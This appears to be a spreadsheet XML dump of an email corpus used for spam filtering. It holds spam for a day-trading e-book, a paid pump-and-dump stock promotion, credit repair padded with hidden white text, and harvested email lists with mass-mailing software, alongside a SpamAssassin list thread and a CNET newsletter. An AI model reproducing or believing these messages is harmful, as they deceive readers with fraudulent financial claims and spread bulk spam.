 Six years later, he bought a beach-front home on the California
 coast - WITH CASH.  Oops, they weren't laughing anymore.
 In a rollercoaster market like we have today, day trading
 is the fastest track to wealth.  If you're looking
 for a long-term retirement investment with no risk 
 that goes up 5% a year, then by all means, this ain't
 your kind of game.
 But if you want the QUICKEST possible way to make a FORTUNE
 in the market, with the lowest element of risk, then
 order the MASTER TRADER e-book right now.  I promise
 to teach you ALL of the secrets that helped me become a
 millionaire through successful day trading.
 You don't need to know anything about the market, and
 anyone can do it, with minimum effort.  It's an easy
 game to win if you know how the pieces move.
 Order the MASTER TRADER e-book right now for only $49.97
 by clicking on the link below:
 http://4tools4life.com/qs
 ******************************************************
 Our company is strictly opposed to unsolicited emails.
 To be removed from this list, please send an email
 to "bulkexpert@yahoo.com"
 ******************************************************
 7248ovub3-523mjZy7405imwk1-594fukK8569ZaXP5-772uMul47
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Defense Stocks -----&gt; only Safe Bet in War Economy
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY leftmargin=3D=220=22 topmargin=3D=220=
 =22 marginwidth=3D=220=22 marginheight=3D=220=22 bgcolor=3D=22=23FFFFFF=22&gt;&lt;CENTER&gt;=
 &lt;TABLE width=3D=22700=22 border=3D=221=22 cellspacing=3D=220=22 cellpadding=3D=2215=
 =22 bordercolor=3D=22=23FF0000=22&gt;&lt;TR&gt;&lt;TD height=3D=22135=22 valign=3D=22top=22&gt;&lt;DI=
 V align=3D=22center=22&gt;&lt;TABLE width=3D=22500=22 border=3D=220=22 cellspacing=3D=220=
 =22 cellpadding=3D=220=22 align=3D=22center=22&gt;&lt;TR valign=3D=22top=22&gt;&lt;TD colspan=3D=
 =223=22 height=3D=2243=22&gt;&lt;DIV align=3D=22center=22&gt;&lt;FONT face=3D=22Arial=22 size=3D=
 =227=22 color=3D=22=23ff0000=22&gt;&lt;B&gt;URGENT NOTICE&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/T=
 ABLE&gt;&lt;DIV align=3D=22center=22&gt;&lt;FONT size=3D=224=22 face=3D=22Arial, Helvetica, =
 sans-serif=22 color=3D=22=230000ff=22&gt;&lt;B&gt;&lt;I&gt;PENDING MERGER TO INCREASE REVENU=
 E 236%&lt;/I&gt;&lt;/B&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT size=3D=224=22 face=3D=22Verdana=22 color=3D=22=23=
 ff0000=22&gt;&lt;BR&gt;&lt;B&gt;NOW IS THE TIME TO INVEST IN GWIH&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/DI=
 V&gt;&lt;UL&gt;&lt;LI&gt;&lt;DIV align=3D=22left=22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-s=
 erif=22 size=3D=222=22&gt;GWIH is rapidly expanding through acquisitions. In th=
 e 1st Quarter TWO mergers are in proces with a schedule to buy FOUR more=
  profitable companies by the year end.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;LI&gt;&lt;DIV =
 align=3D=22left=22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=22=
 2=22&gt;GWIH plans to file for NASDAQ. Stock prices historically increase wh=
 en listed on NASDAQ.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;LI&gt;&lt;DIV align=3D=22left=22&gt;&lt;B=
 &gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;
 On June 30th, a year long Investor Relation and Public Awareness campai=
 gn will be launched to build shareholder equity. SEVERAL well-known stoc=
 k pick newsletters, TV, radio and newsgroups will provide coverage on GW=
 IH and it's acquisitions.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;LI&gt;&lt;DIV align=3D=22left=
 =22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;All-Star =
 Management Team with Advanced Degrees, Specialized Training, Proven Trac=
 k Records and over 90 years Combined Experience. They are true Deal Make=
 rs, Executors and Closers.&lt;BR&gt;&lt;BR&gt;&lt;FONT face=3D=22Times New Roman, Times, =
 serif=22 size=3D=223=22 color=3D=22ff0000=22&gt;&lt;I&gt;Put GWIH on your watch list,&amp;nb=
 sp;&lt;FONT color=3D=220000ff=22&gt;AQUIRE A POSTION IN GWIH TODAY =21&lt;/FONT&gt;&lt;/I&gt;&lt;=
 /FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/UL&gt;&lt;DIV align=3D=22left=22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial,=
  Helvetica, sans-serif=22 size=3D=222=22&gt;GWIH RECENT MERGERS and NEW BUSINES=
 S DEVELOPMENTS:&lt;/FONT&gt;&lt;/B&gt;&lt;UL&gt;&lt;LI&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, san=
 s-serif=22 size=3D=222=22&gt;Acquired Bechler Cams, founded in 1957, specialize=
 s in precision high tolerance parts for aerospace, defense, medical, and=
  surgical manufacturing sectors.&lt;A href=3D=22http://news.moneycentral.msn.=
 com/ticker/article.asp?Symbol=3DUS:GWIH&amp;amp;Feed=3DBW&amp;amp;Date=3D20020404&amp;a=
 mp;ID=3D1534956=22&gt;&lt;BR&gt;CLICK FOR FULL STORY&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;LI&gt;&lt;B&gt;&lt;FONT fac=
 e=3D=22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;Acquired Nelson Engineer=
 ing, BOEING CERTIFIED supplier of aerospace and defense parts was recent=
 ly awarded contracts with Lockheed Martin and Boeing that will result in=
  MAJOR production increases.&lt;A href=3D=22http://news.moneycentral.msn.com/=
 ticker/article.asp?Symbol=3DUS:GWIH&amp;amp;Feed=3DBW&amp;amp;Date=3D20020426&amp;amp;I=
 D=3D1594440=22&gt;&lt;BR&gt;CLICK FOR FULL STORY&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;/B&gt;&lt;/UL&gt;&lt;/DIV&gt;&lt;U=
 L&gt;&lt;BR&gt;&lt;BR&gt;&lt;A href=3D=22http://moneycentral.msn.com/scripts/webquote.dll?ip=
 age=3Dqd&amp;amp;Symbol=3Dgwih=22&gt;&lt;FONT size=3D=224=22 face=3D=22Arial, Helvetica, s=
 ans-serif=22&gt;&lt;B&gt;CLICK FOR QUOTE&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT size=3D=223=22&gt;&lt;=
 BR&gt;&lt;/FONT&gt;&lt;DIV align=3D=22center=22&gt;&lt;FONT size=3D=223=22&gt;&lt;B&gt;&lt;FONT face=3D=22Aria=
 l, Helvetica, sans-serif=22 color=3D=22ff0000=22&gt;
 To unsubscribe simply reply to this email for permanent removal.&lt;/FONT&gt;=
 &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;&lt;=
 BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;=
 BR&gt;&lt;BR&gt;&lt;BR&gt;
 Information within this publication contains =22forward looking=22 statem=
 ents within the meaning of Section 27(a) of the U.S. Securities Act of 1=
 933 and Section 21(e) of the U.S. Securities Exchange Act of 1934. Any s=
 tatements that express or involve discussions with respect to prediction=
 s, expectations, beliefs, plans, projections, objectives, goals, assumpt=
 ions or future events or performance are not statements of historical fa=
 cts and may be forward looking statements. Forward looking statements ar=
 e based on expectations, estimates and projections at the time the state=
 ments are made that involve a number of risks and uncertainties which co=
 uld cause actual results or events to differ materially from those prese=
 ntly anticipated. Forward looking statements may be identified through t=
 he use of words such as expects, will, anticipates, estimates, believes,=
  or by statements indicating certain actions may, could or might occur. =
 Special Situation Alerts (SSA) is an independent publication. SSA was pa=
 id =24100,000 in cash by an independent third party for circulation of th=
 is publication. SSA and/or its Affiliates or agents may already own shar=
 es in GWIH and sell all or part of these shares into the open market at =
 the time of receipt of this publication or immediately after it has prof=
 iled a particular company. SSA is not a registered investment advisor or=
  a broker dealer Be advised that the investments in companies profiled a=
 re considered to be high risk and use of the information provided is at =
 the investor's sole risk and may result in the loss of some or all of th=
 e investment. All information is provided by the companies profiled and =
 SSA makes no representations, warranties or guarantees as to the accurac=
 y or completeness of the disclosure by the profiled companies. Investors=
  should NOT rely on the information presented. Rather, investors should =
 use this information as a starting point for doing additional independen=
 t research to allow the investor to form his or her own opinion regardin=
 g investing in profiled companies. Factual statements as of the date sta=
 ted and are subject to change without notice.&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/UL&gt;&lt;/DIV=
 &gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ***
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Highest-scoring false positive
</t>
  </si>
  <si>
    <t xml:space="preserve">Like an alias for each list that points to the nonspamtrap address.
 J
 At 10:50 AM -0700 8/22/02, Craig R.Hughes wrote:
 &gt;Are you filtering the nonspamtrap for spam when those newsletters 
 &gt;sold your address to someone you didn't sign up with?  You should 
 &gt;probably manually verify that all the mail in the trap is in fact 
 &gt;nonspam!
 &gt;
 &gt;C
 &gt;
 &gt;On Thursday, August 22, 2002, at 07:59  AM, Justin Mason wrote:
 &gt;
 &gt;&gt;
 &gt;&gt;Justin Shore said:
 &gt;&gt;
 &gt;&gt;&gt;I just ran across a false positive that scored 8.6.  The message was
 &gt;&gt;&gt;a solicited ad from Apple.com on educator deals.  I can send a copy
 &gt;&gt;&gt;if anyone wants it.
 &gt;&gt;
 &gt;&gt;Yes, please do send it on, and I'll add it to the non-spam corpus.
 &gt;&gt;
 &gt;&gt;To date, the scores evolved by SpamAssassin are very biased towards
 &gt;&gt;non-HTML, non-newsletter-ish mail.  This release should be different, as
 &gt;&gt;I've been spending the last month signing up a "nonspamtrap" to every
 &gt;&gt;legit newsletter I can find ;)
 &gt;&gt;
 &gt;&gt;This should mean that tests which match common-enough newsletter practices
 &gt;&gt;will no longer get such high scores once we re-run the GA.
 -- 
 --
 Justin Shore, ES-SS ES-SSR                Pittsburg State University
 Network &amp; Systems Manager                 http://www.pittstate.edu/ois/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</si>
  <si>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Re: Money Issues                         OL
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;BODY&gt;&lt;P align=3Dcenter&gt;&lt;FONT size=3D5&gt;&lt;STRONG&gt;&lt;FONT color=3D#3300cc =
 size=3D6&gt;&lt;A href=3D###&gt;&lt;/A&gt;Online Credit Breakthrough&lt;/FONT&gt;&lt;/STRONG&gt;&amp;nbsp=
 ;&lt;/FONT&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;FONT size=3D5&gt;&amp;nbsp;&lt;/FONT&gt;&lt;STRONG&gt;&lt;FONT co=
 lor=3D#ff0000 size=3D6&gt;Repair Your Credit Online!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;font=
  color=3D"#ffffff"&gt;KYx6YrKNxFfE3G4xFe7QLBMT5eAe4KbEtPqIbvbFDovYiEBdA5M72xZ=
 Cu8nTPuwoEC6ZbMz3vGp&lt;/font&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=3D#3300cc=
  size=3D4&gt;That's right - You can now access + clear up bad credit &lt;FONT co=
 lor=3D#ff0000&gt;ONLINE &lt;/FONT&gt; -&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;STRON=
 G&gt;&lt;FONT color=3D#3300cc size=3D4&gt;Directly from the comfort + convienience =
 of your computer!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=
 =3D#3300cc size=3D4&gt;Watch your credit daily, with &lt;FONT color=3D#ff0000&gt;RE=
 AL TIME UPDATES&lt;/FONT&gt; &lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;FONT color=3D=
 #ff0000&gt;&lt;/FONT&gt;&lt;FONT size=3D2&gt;&lt;STRONG&gt;Get the information you need quickly=
  and efficently to remove negative credit items from your report!&lt;/STRONG&gt;=
 &lt;/FONT&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;A href=3Dhttp://365.pakoa.com/creditfix/?cid=
 =3D1580&amp;mid=3D17600&gt;&lt;FONT color=3D#ff0000 size=3D6&gt;Click Here For More Inf=
 ormation&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;&lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT color=3D#000000&gt;Tha=
 nk you - The Web Credit &lt;FONT size=3D1&gt;(tm) &lt;/FONT&gt;&lt;FONT size=3D3&gt;Team!&lt;/F=
 ONT&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt; &lt;font color=3D"#ffffff"&gt;KYx6YrKNxFfE3G4xFe7QLBMT5=
 eAe4KbEtPqIbvbFDovYiEBdA5M72xZCu8nTPuwoEC6ZbMz3vGp&lt;/font&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 99 Million Email Addresses - $99
</t>
  </si>
  <si>
    <t xml:space="preserve">
 TO BE REMOVED FROM FUTURE MAILINGS, SIMPLY REPLY TO
  THIS MESSAGE AND PUT "REMOVE" IN THE SUBJECT.
     99  MILLION
 EMAIL ADDRESSES
   FOR ONLY $99
 OR BETTER YET... DOUBLE THAT COUNT...
    200  MILLION
 EMAIL ADDRESSES
   FOR ONLY $149 
   You want to make some money? 
   I can put you in touch with over 200 million people at virtually no cost.
   Can you make one cent from each of theses names?
 If you can you have a profit of over $2,000,000.00 
   That's right, I have over 200 Million  Fresh  email 
 addresses that I will sell for only $149. These are all 
 fresh addresses that include almost every person 
 on the Internet today, with no duplications. They are 
 all sorted and ready to be mailed.  That is the best 
 deal anywhere today!  Imagine selling a product for 
 only $5 and getting only a 1% response.   That's  OVER
 $10,000,000 IN YOUR POCKET !!! 
   Don't believe it? People are making that kind of 
 money right now by doing the same thing, that is 
 why you get so much email from people selling you 
 their product....it works!  I will even tell you how to 
 mail them with easy to follow step-by-step 
 instructions I include with every order. 
 I will send you a copy of every law concerning 
 email. It is easy to obey the law and make a 
 fortune. These 200 Million email addresses are     
 yours to keep, so you can use them over and 
 over. They come on a collection of several CDs.  
   This offer is not for everyone. If you can not 
 see the just how excellent the risk / reward ratio 
 in this offer is then there is nothing I can do 
 for you.  To make money you must stop dreaming 
 and TAKE ACTION.
 SIX PACKAGES -   ECONOMY   (99 Million Addresses -
                                                             Addresses ONLY)
                                    ECONOMY  PLUS SPECIAL 
                                                            (99 Million Addresses -
                                                             AND a MASS MAILING PROGRAM)
                                    BRONZE         (200 Million Addresses -
                                                           Addresses ONLY)
                                    SILVER            (mailing software included)
                                    GOLD             ( everything to make the Internet
                                                           your personal bank account)
                                    PLATINUM    ( personal  UNLIMITED LIVE TECH 
                                                           support by phone - whenever you
                                                           need it***)
                                  *** These programs are VERY EASY to use.
                                       Some people who are brand new to mailing
                                       like the confidence of LIVE TECH SUPPORT.
                                       It is not needed if you have basic computer skills 
 PACKAGE DESCRIPTIONS BELOW;
 ****************************************
 THE ECONOMY MARKETING SETUP  (99,000,000 addresses ONLY)
 99,000,000 email addresses on CD
 These name are all in text files
 ready to mail!!!
 $99.00
 If you need HIGH SPEED mailing software keep reading below.  
 SEVERAL WAYS TO ORDER !!!
 TO ORDER BY PHONE - CALL   530-343-9681
 OTHER PACKAGES AND OTHER METHODS - SEE BELOW
 ****************************************
 THE ECONOMY PLUS SPECIAL  (99,000,000 addresses AND  MASS MAILING SOFTWARE)
 99,000,000 email addresses on CD
 These name are all in text files
 ready to mail!!!
 PLUS... A MASS MAILING SOFTWARE PROGRAM
 $149.00
 SEVERAL WAYS TO ORDER !!!
 TO ORDER BY PHONE - CALL   530-343-9681
 OTHER PACKAGES AND OTHER METHODS - SEE BELOW
 ****************************************
 THE BRONZE MARKETING SETUP  (addresses ONLY)
 200,000,000 email addresses on CD
 These name are all in text files
 ready to mail!!!
 $149.00
 If you need HIGH SPEED mailing software keep reading below.  
 SEVERAL WAYS TO ORDER !!!
 TO ORDER BY PHONE - CALL   530-343-9681
 OTHER PACKAGES AND OTHER METHODS - SEE BELOW
 ****************************************
 THE SILVER MARKETING SETUP
 200,000,000 email addresses on CD
 These name are all in text files
 ready to mail!!!       AND
 Several different email programs 
 and tools  to help with your mailings
 and list management.
 $ 189.00
 SEVERAL WAYS TO ORDER !!!
 TO ORDER BY PHONE - CALL   530-343-9681
 OTHER PACKAGES AND OTHER METHODS - SEE BELOW
 ****************************************
 THE GOLD MARKETING SETUP
 VIRTUALLY EVERYTHING!!
 200,000,000 email addresses on CD
 These name are all in text files
 ready to mail!!!       AND
 Several different email programs 
 and tools  to help with your mailings
 and list management.
              AND 
 Over 500 different Business Reports
 now being sold on the Internet for up to
 $100 each. You get full rights to resell these
 reports.
 With this package you get the email addresses, 
 the software to mail them AND ready to sell  
 information products.
 AND ...... 
  a collection of the 100 best money making
 adds currently floating around on the Internet.
 $ 249
 SEVERAL WAYS TO ORDER !!!
 TO ORDER BY PHONE - CALL   530-343-9681
 OTHER METHODS - SEE BELOW
 *************************************************************
 THE PLATINUM MARKETING SETUP
 VIRTUALLY EVERYTHING!!
 200,000,000 email addresses on CD
 These name are all in text files
 ready to mail!!!       AND
 Several different email programs 
 and tools  to help with your mailings
 and list management.
              AND 
 Over 500 different Business Reports
 now being sold on the Internet for up to
 $100 each. You get full rights to resell these
 reports.
 With this package you get the email addresses, 
 the software to mail them AND ready to sell  
 information products.
 AND ...... 
  a collection of the 100 best money making
 adds currently floating around on the Internet.
 AND.....
 LIVE TECH SUPPORT... WHENEVER YOU NEED IT...
 FOR AS LONG AS YOU NEED IT!!!
 $339
 **********************************************************
 SEVERAL WAYS TO ORDER !!!
 TO ORDER BY PHONE - CALL   530-343-9681
 OTHER METHODS - SEE BELOW
 IF YOU ORDER BY PHONE OR FAX WE WILL SHIP YOUR CD CONTAINING THE 200 (99) MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!
 WE ACCEPT:  AMERICAN EXPRESS,  VISA &amp; MASTERCARD
     TYPE OF CARD  AMX / VISA / MC??_______________
     EXPIRATION DATE   ___________________________
     NAME ON CREDIT CARD________________________
     CREDIT CARD #_______________________________
     BILLING ADDRESS ____________________________
     CITY_________________________________________
     STATE___________________ZIP__________________
     COUNTRY____________________________________
     PHONE INCLUDE AREA CODE___________________
     EMAIL ADDRESS______________________________ 
     WE WILL BILL selected amount to your account PLUS one of the 
 following shipping costs:
      SHIPPING  COST OF $3.85 FIRST CLASS MAIL
      SHIPPING COST OF  $15.00  FEDERAL EXPRESS
      INTERNATIONAL SHIPPING CHARGE $25.00 
       + SALES TAX  added where required 
    1) FAX your order and a copy of your SIGNED check payable to 
 Cyber FirePower!  for the appropriate amount to FAX # 530-343-1808.
    2) Fax the same above requested credit card information to 
 FAX # 530-343-1808. 
    3) Call phone # 530-343-9681.  This is a 24 hour phone 
 number to place a CREDIT CARD order. This is an ORDER LINE
 only.
 ALL INFORMATION NECESSARY FOR YOU TO SUCCESSFULLY MAIL QUICKLY,
 PROPERLY, &amp; LEGALLY IS PROVIDED WITH YOUR ORDER.
 Copyright 2000, 2001
 Please NOTE: This advertisement is NOT sponsored by ANY
 Internet Service Provider. This is an advertisement that is produced and
 sponsored by Cyber FirePower! for Cyber FirePower! to reach potential customers.
 ALSO TAKE NOTE: At the time of this mailing the return email address is a bonafide
 legitimate return email address that was signed up for with the express purpose of
 receiving all undeliverable emails as well as remove requests. On occasion the return
 email address provided may become disrupted by the efforts of, what we define as,
 Internet terrorists. If this is the case and you wish removal please call us.
 If you fax a copy of your phone bill where you called us for removal we will 
 reimburse you via PayPal.
 Congress shall make no law respecting an establishment of religion, or prohibiting the free
  exercise thereof, or abridging the freedom of speech or of the press; or the right of the
  people peaceably to assemble, and to petition the Government for a redress of grievances.         
 Amendment I, The US Constitution
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: The tech side of homeland defense
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;The tech side of homeland defense&lt;/title&gt;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href="http://clickthru.online.com/Click?q=8b-SBGBQY0y_jEH6S-EYIEElDh4B1FR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQBqXHDksKFUByjw2PB1s79R" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7U7vHrWZW41PHq15ZNEEZuR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ca-iciuQUgFRL-ryUwcl8jfOfRHHUsR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFHEM3PdEfbQq-Kh1XhaZR"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10, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 The tech side of homeland defense&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Studios sue defunct $1 movie site&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 $215 million later, start-up Pluris shuts down&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Apple to expand iMac LCD display&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 NextCard cuts off credit card customers&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tapping China's brainpower&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwx12fOmcJ6DmLwgkaZmRuR" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;The tech side of homeland defense&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Computer security is becoming an increasingly critical part of President Bush's proposal for a Department of Homeland Security, as politicians fret about tech-savvy terrorists--and insist that any new agency must shield the United States from electronic attacks. Meanwhile, the administration says that it's open to the idea of a chief privacy officer for the agency.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 9:45 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrscnu8APVBwhq6GOxuYzsR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Studios sue defunct $1 movie site&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The movie studio's trade association filed suit Tuesday against Film88.com, a would-be Internet video Web site that has allegedly popped up in several incarnations around the world.
 Calling the site a "piratical, virtual 'video-on-demand' business," the Motion Picture Association of America (MPAA) and its member studios sued the company and an individual allegedly associated with it in a California federal court.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 12:00 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58w5y56vxw1xmYgHobjqmZR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;$215 million later, start-up Pluris shuts down&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Networking start-up Pluris will release a statement Wednesday announcing it has closed its doors due to a lack of funding and ongoing woes in the market it serves, according to a spokeswoman familiar with the company's plans.
 Pluris, a once promising company, burned through $215 million over the past few years as it attempted to build a high-end router that was intended to outclass similar products from competitors such as Juniper Networks and Cisco Systems.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 12:30 PM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd819BGQXK3_tvVyn4IcgdR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Apple to expand iMac LCD display&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Apple Computer plans to serve up a new iMac model with a larger flat-panel display during next week's Macworld Expo trade show, according to sources.
 The upgrade to a 17-inch liquid crystal display (LCD) comes as sales have all but stalled on existing 15-inch flat-panel iMacs. Apple unveiled the original flat-panel iMac, which suspends the monitor from a pivoting arm attached to a hemispherical base, during January's Macworld Expo in San Francisco.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 3:50 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSenC_nvIVX4RVXFO5JSrR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;NextCard cuts off credit card customers&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Federal regulators on Wednesday deactivated hundreds of thousands of credit cards belonging to former customers of NextCard.
 The Federal Deposit Insurance Corporation (FDIC), which had been trying unsuccessfully to sell the 800,000 accounts since taking them over in February, shut them down after they failed certain performance measures over the past three months, said David Barr, an FDIC spokesman. Although NextCard customers will no longer be able to use their cards to make purchase or cash withdrawals, they will continue to be responsible for their outstanding balances.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 12:25 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn06tVlLMrshsnStcVTQzciR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Tapping China's brainpower&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The country's engineers are ambitious--and finding open arms at U.S. companies.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 10, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtWIn_tyqT8UEE0WNrUZlR"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&lt;b&gt;The WorldCom hearing's target: voters&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
